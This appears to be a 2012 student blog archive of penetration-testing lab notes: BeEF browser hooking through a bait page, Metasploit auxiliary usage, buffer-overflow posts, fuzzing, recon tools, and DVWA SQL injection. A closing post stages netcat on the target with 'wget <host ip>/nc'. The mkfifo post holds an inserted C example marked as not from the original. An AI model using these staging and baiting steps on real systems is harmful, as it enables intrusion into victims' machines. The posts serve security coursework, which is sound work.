Wednesday, 29 February 2012

Combine Browser and Metasploit

This time, I try to combine the browser and Metasploit to exploit the victim.
Using BeEF, copy the JavaScript to the web page that we put up as bait for the victim computer, so that the victim computer can be connected to our computer.


Monday, 27 February 2012

File exploit and Web exploit

The first computer I had to exploit the first victim, do information gathering and do exploitable 


with file exploit


Auxiliary using Metasploit

Search for the auxiliary modules with the command show auxiliary in msfconsole.


After that, choose one of the auxiliary modules; to see its settings, use the command show options.


After that, set RHOST and RPORT


and exploit


Social Engineering

Social engineering is the acquisition of secret or sensitive information, or edicts, by deceiving the owner of that information. Social engineering is typically done via telephone or the Internet. It is one of the methods used by hackers to gain information about the target, by requesting the information directly from the victim or from others who have that information.

Social engineering concentrates on the weakest link in the chain of a computer network system, namely humans. As we know, there is no computer system that does not involve human interaction. Worse, this vulnerability is universal, independent of platforms, operating systems, protocols, software or hardware. That is, every system has the same weakness in the human factor. Any person who has physical access to the system is a threat, even if that person is not covered by the security policy that has been developed. Like other methods such as hacking, social engineering also requires preparation; indeed, most of the work is the preparation itself.

MSFPAYLOAD

Friday, 17 February 2012

Buffer Overflow BigAnt SEH

What is BigAnt?
BigAnt is an instant messenger that features 128-bit encrypted messages and file sending, a clearly structured online list of users, and ease of use. BigAnt is used on client computers together with server computers.


Sunday, 12 February 2012

Buffer Overflow RM-MP3 Converter

This time, I try to exploit RM-MP3 Converter with the buffer overflow method.
Prepare the file which will be used as a tool for the buffer overflow,


Sunday, 05 February 2012

Saturday, 04 February 2012

OllyDbg and installation

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries.
OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

Friday, 03 February 2012

fuzzer and fuzzing

A fuzzer is the application used in the fuzzing process. Fuzzing is a process or method used to find logic errors and failures in a data-processing application by providing abnormal input to the application and observing its behaviour and how it handles the resulting exceptions.
A fuzzer basically works by sending data simultaneously and repeatedly, either automatically or semi-automatically, into software for processing. The input data is usually not normal; it is specially crafted, for example using special characters or having an abnormal amount or length of data.

Register Memory

Register memory is memory that is very small in size but has very high-speed access. Registers are used to hold the data and instructions being processed, while other data and instructions waiting to be processed are in main memory.

Wednesday, 01 February 2012

Assignment 8

download

By Pass FBIP

Open the FBIP at "localhost/fbip"


MKFIFO

The function "mkfifo" can be used to create a named pipe from within a program. The signature of the function is as follows:
int mkfifo(const char *path, mode_t mode)
The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREAT|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.
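
The EEXIST and ownership behaviour described above, as an added example that is not code from the original post: it creates an owner-only FIFO and, when the path already exists, reuses it only if it is a FIFO owned by the effective user with no group/other permissions. The names ensure_private_fifo and fifo_status and the /tmp/fifo_demo_ scratch path are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Status names are this example's own, not part of any library. */
enum fifo_status { FIFO_CREATED = 0, FIFO_REUSED = 1, FIFO_REJECTED = -1 };

/* Create an owner-only named pipe at `path`. On EEXIST, reuse the existing
 * entry only if it is a FIFO we own with no group/other permission bits. */
enum fifo_status ensure_private_fifo(const char *path)
{
    struct stat st;

    /* 0600 is an upper bound: the process umask can only clear bits. */
    if (mkfifo(path, S_IRUSR | S_IWUSR) == 0)
        return FIFO_CREATED;
    if (errno != EEXIST)
        return FIFO_REJECTED;      /* e.g. EACCES, ENOENT */

    /* lstat() so a symlink planted at `path` is not followed. */
    if (lstat(path, &st) != 0 || !S_ISFIFO(st.st_mode))
        return FIFO_REJECTED;
    if (st.st_uid != geteuid())
        return FIFO_REJECTED;
    if (st.st_mode & (S_IRWXG | S_IRWXO))
        return FIFO_REJECTED;
    return FIFO_REUSED;
}

int main(void)
{
    char dir[] = "/tmp/fifo_demo_XXXXXX";   /* constructed scratch location */
    char path[64];

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(path, sizeof path, "%s/pipe", dir);
    printf("first call:  %d\n", ensure_private_fifo(path));
    printf("second call: %d\n", ensure_private_fifo(path));
    unlink(path);
    rmdir(dir);
    return 0;
}
```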

Maltego


Maltego is a platform that gives the information we want to know about a target, which can be in the form of infrastructure or personal information.

Maltego is a program that can be used to determine the relationships and real world links between:
  • People
  • Groups of people (social networks)
  • Companies
  • Organizations
  • Web sites
  • Internet infrastructure such as:

About Shodanhq

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Shodan also lets you use boolean operators (‘+’, ‘-’ and ‘|’) to include/exclude certain terms. By default, every search term has a ‘+’ operator assigned to it.
In addition to boolean operators, there are special filters to narrow down the search results.

Exploitation of DVWA with SQL Injection

First, the DVWA security is set to low


Then choose SQL Injection and try entering a user ID, for example '1', and submit; it will display an error

NC Revision

Here I am making a correction about NC.
Place the nc file in the www folder


Download it on the target system with the command "wget <host ip>/nc"